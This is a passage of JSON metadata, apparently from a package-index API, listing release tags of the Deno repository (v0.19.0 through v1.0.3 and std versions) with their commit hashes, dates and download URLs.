ha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/de